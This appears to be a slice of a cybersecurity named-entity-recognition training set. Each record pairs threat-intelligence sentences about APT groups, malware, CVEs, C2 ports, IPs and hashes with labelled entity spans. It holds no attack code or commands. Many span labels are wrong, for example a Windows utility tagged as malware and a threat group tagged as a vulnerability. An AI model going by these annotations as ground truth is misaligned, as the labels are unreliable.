{"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . File type: JPEG image data , JFIF standard 1.02 .", "spans": {"MALWARE: Ashas": [[47, 52]], "THREAT_ACTOR: FIN7": [[228, 232]], "TOOL: PowerShell script": [[262, 279]], "MALWARE: sdbinst.exe": [[296, 307]]}, "info": {"id": "cyberner_stix_train_002037", "source": "cyberner_stix_train"}}
{"text": "Our analysis indicates that the threat actors are no longer limiting their campaigns to East Asian countries , but are targeting additional countries around the world . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights .", "spans": {"THREAT_ACTOR: APT33": [[206, 211]], "ORGANIZATION: Security Analyst Summit": [[461, 484]], "ORGANIZATION: SAS": [[487, 490]], "ORGANIZATION: Kaspersky Lab": [[500, 513]], "ORGANIZATION: bank": [[580, 584]], "THREAT_ACTOR: Metel": [[597, 602]], "THREAT_ACTOR: GCMAN": [[607, 612]], "THREAT_ACTOR: Carbanak group": [[642, 656]]}, "info": {"id": "cyberner_stix_train_002038", "source": "cyberner_stix_train"}}
{"text": "When we published that blog Unit 42 hadn ’ t seen any of the three registrants overlap domains used in malicious activity . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": {"THREAT_ACTOR: APT33": [[436, 441]]}, "info": {"id": "cyberner_stix_train_002039", "source": "cyberner_stix_train"}}
{"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": {"TOOL: legitimate Thai websites": [[30, 54]], "MALWARE: web shells": [[167, 177]]}, "info": {"id": "cyberner_stix_train_002040", "source": "cyberner_stix_train"}}
{"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works . APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 . OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 . The Budworm advanced persistent threat APT group continues to actively develop its toolset .", "spans": {"THREAT_ACTOR: APT10": [[162, 167], [382, 387]], "TOOL: Poison Ivy malware family": [[190, 215]], "ORGANIZATION: FireEye": [[229, 236]], "THREAT_ACTOR: threat actors": [[356, 369]], "THREAT_ACTOR: OceanLotus": [[390, 400]], "FILEPATH: e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e": [[403, 467]], "THREAT_ACTOR: The Budworm advanced persistent threat APT group": [[480, 528]], "TOOL: toolset": [[563, 570]]}, "info": {"id": "cyberner_stix_train_002041", "source": "cyberner_stix_train"}}
{"text": "Since this tool allows an attacker to sniff passwords from network traffic , it could have been used on the hotel Wi-Fi network to obtain a user ’s credentials .", "spans": {"TOOL: network traffic": [[59, 74]], "TOOL: Wi-Fi network": [[114, 127]]}, "info": {"id": "cyberner_stix_train_002042", "source": "cyberner_stix_train"}}
{"text": "In addition to this file , the sample also contacted 104.238.184.252 for the PowerShell executable .", "spans": {"IP_ADDRESS: 104.238.184.252": [[53, 68]], "TOOL: PowerShell": [[77, 87]]}, "info": {"id": "cyberner_stix_train_002043", "source": "cyberner_stix_train"}}
{"text": "This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": {"MALWARE: China Chopper": [[147, 160]], "VULNERABILITY: CVE-2015-0062": [[289, 302]], "VULNERABILITY: CVE-2015-1701": [[305, 318]], "VULNERABILITY: CVE-2016-0099": [[323, 336]], "THREAT_ACTOR: attacker": [[350, 358]], "THREAT_ACTOR: APT37": [[399, 404]], "MALWARE: SLOWDRIFT": [[417, 426]], "MALWARE: malware": [[427, 434]], "ORGANIZATION: academic": [[491, 499]], "ORGANIZATION: strategic institutions": [[504, 526]]}, "info": {"id": "cyberner_stix_train_002044", "source": "cyberner_stix_train"}}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]], "THREAT_ACTOR: Spring Dragon group": [[297, 316]], "VULNERABILITY: exploits": [[354, 362]]}, "info": {"id": "cyberner_stix_train_002045", "source": "cyberner_stix_train"}}
{"text": "After libmsy.so decrypts the asset file tong.luo , it loads mycode.jar dynamically into FakeSpy ’ s process , as is shown from the output of the “ adb logcat ” command . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": {"MALWARE: FakeSpy": [[88, 95]], "THREAT_ACTOR: threat actors": [[261, 274]]}, "info": {"id": "cyberner_stix_train_002046", "source": "cyberner_stix_train"}}
{"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"ORGANIZATION: The New York Times": [[60, 78]], "THREAT_ACTOR: APT12": [[121, 126]], "TOOL: Backdoor.APT.Aumlib": [[183, 202]], "TOOL: Backdoor.APT.Ixeshe malware families": [[207, 243]], "IP_ADDRESS: 99.250.250.199": [[301, 315]], "ORGANIZATION: Bulgaria": [[468, 476]], "ORGANIZATION: China": [[479, 484]], "ORGANIZATION: Vietnam": [[487, 494]]}, "info": {"id": "cyberner_stix_train_002047", "source": "cyberner_stix_train"}}
{"text": "It remains unclear whether these are leftover code from the previous versions or their particular purposes were served .", "spans": {}, "info": {"id": "cyberner_stix_train_002048", "source": "cyberner_stix_train"}}
{"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘ update ’ that may go unnoticed . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments . If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated . TIEDYE ( xpc.protect )", "spans": {"MALWARE: ViperRAT": [[0, 8]], "TOOL: PDF attachments": [[279, 294]], "TOOL: netsvc": [[456, 462]], "MALWARE: TIEDYE ( xpc.protect )": [[507, 529]]}, "info": {"id": "cyberner_stix_train_002049", "source": "cyberner_stix_train"}}
{"text": "For example the actor changed the XOR key and the MUTEX name .", "spans": {}, "info": {"id": "cyberner_stix_train_002050", "source": "cyberner_stix_train"}}
{"text": "The .NET variant creates “ 1FABFBFF0000065132F71D94 ” , while the native version creates “ 000206511FABFBFF ” .", "spans": {"TOOL: .NET": [[4, 8]], "FILEPATH: 1FABFBFF0000065132F71D94": [[27, 51]], "FILEPATH: 000206511FABFBFF": [[91, 107]]}, "info": {"id": "cyberner_stix_train_002051", "source": "cyberner_stix_train"}}
{"text": "It also will gather email addresses scraped from files stored on the computer .", "spans": {"TOOL: email": [[20, 25]]}, "info": {"id": "cyberner_stix_train_002052", "source": "cyberner_stix_train"}}
{"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users ’ mobile devices for generating fraudulent clicks , benefiting the attackers . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly . It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created . After analyzing code from a command and control ( C2 ) server used in the global cyber - espionage campaign dubbed ' Sharpshooter ' , security researchers found more evidence linking it to North Korea 's Lazarus threat actor .", "spans": {"ORGANIZATION: DHS": [[246, 249]], "ORGANIZATION: Symantec": [[336, 344]], "MALWARE: ZxShell": [[428, 435]], "SYSTEM: command and control ( C2 ) server": [[566, 599]], "ORGANIZATION: security researchers": [[672, 692]], "THREAT_ACTOR: North Korea 's Lazarus": [[727, 749]]}, "info": {"id": "cyberner_stix_train_002053", "source": "cyberner_stix_train"}}
{"text": "Examples include CozyDuke infecting its victims with SeaDuke , HammerDuke ,or OnionDuke ; and CosmicDuke infecting its victims with PinchDuke ,GeminiDuke or MiniDuke .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "MALWARE: SeaDuke": [[53, 60]], "MALWARE: HammerDuke": [[63, 73]], "MALWARE: OnionDuke": [[78, 87]], "MALWARE: CosmicDuke": [[94, 104]], "MALWARE: PinchDuke": [[132, 141]], "MALWARE: ,GeminiDuke": [[142, 153]], "MALWARE: MiniDuke": [[157, 165]]}, "info": {"id": "cyberner_stix_train_002054", "source": "cyberner_stix_train"}}
{"text": "APK files will not natively open in an environment other than an Android device . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . It used a multi-stage binary infection to update each module effectively and evade detection . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"SYSTEM: Android": [[65, 72]], "VULNERABILITY: Flash exploits": [[93, 107]], "VULNERABILITY: Java zero-day": [[177, 190]], "ORGANIZATION: Kaspersky Lab": [[250, 263]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[276, 304]], "MALWARE: SocGholish": [[422, 432]]}, "info": {"id": "cyberner_stix_train_002055", "source": "cyberner_stix_train"}}
{"text": ". Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments . Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"TOOL: IP": [[70, 72]], "MALWARE: Pierogi": [[187, 194]], "MALWARE: backdoor": [[201, 209]], "TOOL: backdoor": [[247, 255]], "TOOL: Delphi": [[267, 273]], "ORGANIZATION: Microsoft": [[361, 370]]}, "info": {"id": "cyberner_stix_train_002056", "source": "cyberner_stix_train"}}
{"text": "Now that specific Babar samples have been identified and analyzed , there might be new information , also with regards to similarities or differences between the two Remote Administration Tools ( RATs ) EvilBunny and Babar . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": {"TOOL: Babar samples": [[18, 31]], "TOOL: Remote Administration Tools": [[166, 193]], "TOOL: RATs": [[196, 200]], "TOOL: EvilBunny": [[203, 212]], "TOOL: Babar": [[217, 222]], "FILEPATH: st07383.en17.docx": [[237, 254]], "VULNERABILITY: CVE-2017-0001": [[305, 318]], "FILEPATH: SHIRIME": [[424, 431]]}, "info": {"id": "cyberner_stix_train_002057", "source": "cyberner_stix_train"}}
{"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 3CE30F5FED4C67053379518EACFCF879 The parent process ’ s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on . Winnti : T1043 Commonly Used Port ( 80 , 443 ) . Users were drawn to a login prompt that was designed to harvest user credentials with pages that looked like Adobe , Microsoft , etc .", "spans": {"TOOL: IRC bot": [[471, 478]], "TOOL: MPK": [[486, 489]], "TOOL: Leash sample": [[533, 545]], "THREAT_ACTOR: Winnti": [[562, 568]], "TOOL: Adobe": [[720, 725]], "TOOL: Microsoft": [[728, 737]]}, "info": {"id": "cyberner_stix_train_002058", "source": "cyberner_stix_train"}}
{"text": "More recent variants blend rooting capabilities and click fraud . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : • At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) •", "spans": {"THREAT_ACTOR: MoneyTaker": [[84, 94]], "TOOL: EPS": [[347, 350]], "VULNERABILITY: CVE-2015-1701": [[369, 382]], "SYSTEM: system and web server logs": [[402, 428]]}, "info": {"id": "cyberner_stix_train_002059", "source": "cyberner_stix_train"}}
{"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. ” When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim ’ s mobile device . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": {"MALWARE: TrickBot": [[18, 26]], "THREAT_ACTOR: BalkanDoor": [[351, 361]], "VULNERABILITY: CVE-2018-20250": [[451, 465]], "ORGANIZATION: FireEye 's Mandiant": [[493, 512]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[557, 591]]}, "info": {"id": "cyberner_stix_train_002060", "source": "cyberner_stix_train"}}
{"text": "large manufacturing companies , particularly those supplying defense organizations , energy companies , embassies in Washington , DC representing countries in the Middle East , Europe , and Asia , likely to target U.S. based users involved in international relations , non-governmental organizations ( NGOs ) , particularly those focused on international relations and defense , government organizations .", "spans": {"ORGANIZATION: DC": [[130, 132]]}, "info": {"id": "cyberner_stix_train_002061", "source": "cyberner_stix_train"}}
{"text": "The threat actor had a specific pattern of behavior that allowed us to understand their modus operandi : they used one server with the same IP address for multiple operations . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "ORGANIZATION: civil society": [[246, 259]], "ORGANIZATION: human rights organizations": [[264, 290]], "ORGANIZATION: diaspora": [[420, 428]]}, "info": {"id": "cyberner_stix_train_002062", "source": "cyberner_stix_train"}}
{"text": "APT28 Targets Hospitality Sector , Presents Threat to Travelers .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_002063", "source": "cyberner_stix_train"}}
{"text": "Based on our KSN statistics , there are several infected individuals , exclusively in Italy . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": {"THREAT_ACTOR: MuddyWater": [[139, 149]], "TOOL: ATM systems": [[299, 310]], "TOOL: payment systems": [[331, 346]], "TOOL: SWIFT systems": [[351, 364]]}, "info": {"id": "cyberner_stix_train_002064", "source": "cyberner_stix_train"}}
{"text": "The following screenshot shows the contacts being stolen and written in a local array , which is then sent to C & C : Uninstalling apps Uninstalling apps is another function favored by developers of Android spyware and malware . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw .", "spans": {"SYSTEM: Android": [[199, 206]], "THREAT_ACTOR: Silence": [[229, 236]], "THREAT_ACTOR: Cobalt": [[513, 519]], "ORGANIZATION: financial institutions": [[597, 619]]}, "info": {"id": "cyberner_stix_train_002065", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "MALWARE: Metasploit": [[270, 280]]}, "info": {"id": "cyberner_stix_train_002066", "source": "cyberner_stix_train"}}
{"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": {"TOOL: RDP": [[6, 9]], "TOOL: GandCrab": [[170, 178]]}, "info": {"id": "cyberner_stix_train_002067", "source": "cyberner_stix_train"}}
{"text": "As soon as the user clicks the spyware ’ s icon for the first time , nothing seems to happen and the icon disappears from the home screen . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": {"THREAT_ACTOR: Silence": [[171, 178]], "ORGANIZATION: banks": [[228, 233]], "THREAT_ACTOR: Charming Kitten": [[290, 305]]}, "info": {"id": "cyberner_stix_train_002068", "source": "cyberner_stix_train"}}
{"text": "Just like in previous examples , the malware author does not use this package . These threats are capable of opening a back door and stealing information from victims' computers . From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server . GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": {"ORGANIZATION: FireEye": [[211, 218]], "THREAT_ACTOR: APT12": [[228, 233]], "MALWARE: RIPTIDE": [[244, 251]], "TOOL: command and control": [[320, 339]], "TOOL: C2": [[342, 344]], "MALWARE: GoldenSpy": [[356, 365]], "MALWARE: GravityRAT": [[506, 516]], "MALWARE: HARDRAIN": [[589, 597]], "MALWARE: HOPLIGHT": [[656, 664]], "MALWARE: Lazarus Group malware": [[739, 760]], "MALWARE: MacMa": [[877, 882]], "SYSTEM: C2 Communication.[21": [[910, 930]]}, "info": {"id": "cyberner_stix_train_002069", "source": "cyberner_stix_train"}}
{"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens . this did not work for functions with three or more dispatchers . However , not all insider threats are intentional , according to an Insider Threat Report from Crowd Research Partners .", "spans": {"SYSTEM: Google Play": [[65, 76]], "ORGANIZATION: Jerusalem Post": [[239, 253]], "ORGANIZATION: Palestinian Authority": [[322, 343]], "THREAT_ACTOR: CopyKittens": [[385, 396]], "ORGANIZATION: Crowd Research Partners": [[559, 582]]}, "info": {"id": "cyberner_stix_train_002070", "source": "cyberner_stix_train"}}
{"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups . In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed . Indicators of Attack are different from Indicators of Compromise IoC , the latter describing evidence of compromised network security .", "spans": {"ORGANIZATION: defense contractors": [[180, 199]], "ORGANIZATION: colleges": [[202, 210]], "ORGANIZATION: universities": [[215, 227]], "ORGANIZATION: law firms": [[230, 239]], "ORGANIZATION: political organizations": [[246, 269]], "ORGANIZATION: minority ethnic groups": [[315, 337]], "FILEPATH: hpqhvsei.dll": [[348, 360]], "FILEPATH: hpqhvind.exe": [[399, 411]]}, "info": {"id": "cyberner_stix_train_002071", "source": "cyberner_stix_train"}}
{"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Another time , the execution flow moves from “ exit.exe to “ i.cmd ” .", "spans": {"MALWARE: wuaupdt.exe": [[448, 459]], "FILEPATH: exit.exe": [[602, 610]], "FILEPATH: i.cmd": [[616, 621]]}, "info": {"id": "cyberner_stix_train_002072", "source": "cyberner_stix_train"}}
{"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware . They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export . The availability of such builders allows novice actors to generate their own customized ransomware variants .", "spans": {"MALWARE: FinFisher": [[135, 144]], "THREAT_ACTOR: attacker": [[304, 312]], "TOOL: RATs": [[346, 350]], "TOOL: C2": [[534, 536]], "TOOL: CreateInstance": [[640, 654]], "VULNERABILITY: The availability of such builders": [[666, 699]]}, "info": {"id": "cyberner_stix_train_002073", "source": "cyberner_stix_train"}}
{"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": {"ORGANIZATION: aerospace": [[27, 36]], "ORGANIZATION: energy": [[39, 45]], "ORGANIZATION: government": [[48, 58]], "ORGANIZATION: high-tech": [[61, 70]], "ORGANIZATION: consulting services": [[73, 92]], "ORGANIZATION: chemicals": [[99, 108]], "ORGANIZATION: manufacturing": [[111, 124]], "ORGANIZATION: mining sectors": [[127, 141]], "THREAT_ACTOR: Infy": [[353, 357]]}, "info": {"id": "cyberner_stix_train_002074", "source": "cyberner_stix_train"}}
{"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time . Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover . One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network . These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . Curiously though , Waterbug also compromised other computers on the victim’s network using its own infrastructure . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe ) was dropped on to a computer on the victim’s network . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 . Waterbug’s intrusions on the victim’s network continued for much of 2018 . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point .", "spans": {"ORGANIZATION: Unit 42": [[3, 10]], "THREAT_ACTOR: OilRig": [[56, 62], [822, 828]], "THREAT_ACTOR: SWEED": [[158, 163]], "THREAT_ACTOR: Turla": [[318, 323], [482, 487]], "TOOL: email": [[348, 353]], "MALWARE: Outlook Backdoor": [[385, 401]], "MALWARE: LightNeuron": [[409, 420]], "MALWARE: frameworks": [[543, 553]], "FILEPATH: Neptun": [[577, 583]], "ORGANIZATION: Microsoft": [[600, 609]], "THREAT_ACTOR: attackers": [[685, 694]], "THREAT_ACTOR: Crambus": [[810, 817], [2270, 2277]], "THREAT_ACTOR: APT34": [[831, 836]], "THREAT_ACTOR: Waterbug": [[839, 847], [1307, 1315], [1462, 1470], [1649, 1657], [1826, 1834], [2043, 2051], [2557, 2565], [2669, 2677]], "MALWARE: Meterpreter": [[863, 874], [953, 964]], "THREAT_ACTOR: Waterbug’s": [[1072, 1082], [1213, 1223], [2400, 2410]], "MALWARE: Crambus infrastructure": [[1090, 1112]], "ORGANIZATION: compromise governments": [[1501, 1523]], "ORGANIZATION: international organizations": [[1528, 1555]], "ORGANIZATION: IT": [[1603, 1605]], "ORGANIZATION: education sectors": [[1610, 1627]], "ORGANIZATION: infrastructure": [[1729, 1743]], "ORGANIZATION: Symantec": [[1746, 1754], [2475, 2483]], "MALWARE: Mimikatz": [[1784, 1792], [1909, 1917]], "ORGANIZATION: education": [[1975, 1984]], "FILEPATH: msfgi.exe": [[2141, 2150]], "ORGANIZATION: Crambus infrastructure": [[2696, 2718]]}, "info": {"id": "cyberner_stix_train_002075", "source": "cyberner_stix_train"}}
{"text": "Debug BuildConfig with the version After a deep analysis of all discovered versions of Skygofree , we made an approximate timeline of the implant ’ s evolution . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . It is responsible for the Operation SMN campaign .", "spans": {"MALWARE: Skygofree": [[87, 96]], "THREAT_ACTOR: OceanLotus": [[166, 176]]}, "info": {"id": "cyberner_stix_train_002076", "source": "cyberner_stix_train"}}
{"text": "Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": {"THREAT_ACTOR: groups": [[6, 12]], "THREAT_ACTOR: Buhtrap": [[23, 30]], "THREAT_ACTOR: Corkow": [[33, 39]], "THREAT_ACTOR: Carbanak": [[44, 52]], "ORGANIZATION: financial institutions": [[118, 140]], "ORGANIZATION: customers": [[151, 160]], "ORGANIZATION: Proofpoint": [[243, 253]], "ORGANIZATION: embassies": [[372, 381]]}, "info": {"id": "cyberner_stix_train_002077", "source": "cyberner_stix_train"}}
{"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"MALWARE: Leader": [[151, 157]], "MALWARE: Bookworm": [[161, 169]], "MALWARE: Trojan": [[227, 233]], "FILEPATH: DLLs": [[265, 269]]}, "info": {"id": "cyberner_stix_train_002078", "source": "cyberner_stix_train"}}
{"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": {"VULNERABILITY: EternalBlue": [[20, 31]], "TOOL: Metasploit": [[43, 53]], "THREAT_ACTOR: actors": [[82, 88]], "ORGANIZATION: CTU": [[157, 160]]}, "info": {"id": "cyberner_stix_train_002079", "source": "cyberner_stix_train"}}
{"text": "It installs malicious modules with different functionality into the system . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon . The scale and impact of APT1 ’s operations compelled us to write this report . Together with our partner CrySyS Lab , we ’ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": {"THREAT_ACTOR: APT1": [[250, 254]], "ORGANIZATION: CrySyS Lab": [[331, 341]], "MALWARE: Miniduke": [[418, 426]]}, "info": {"id": "cyberner_stix_train_002080", "source": "cyberner_stix_train"}}
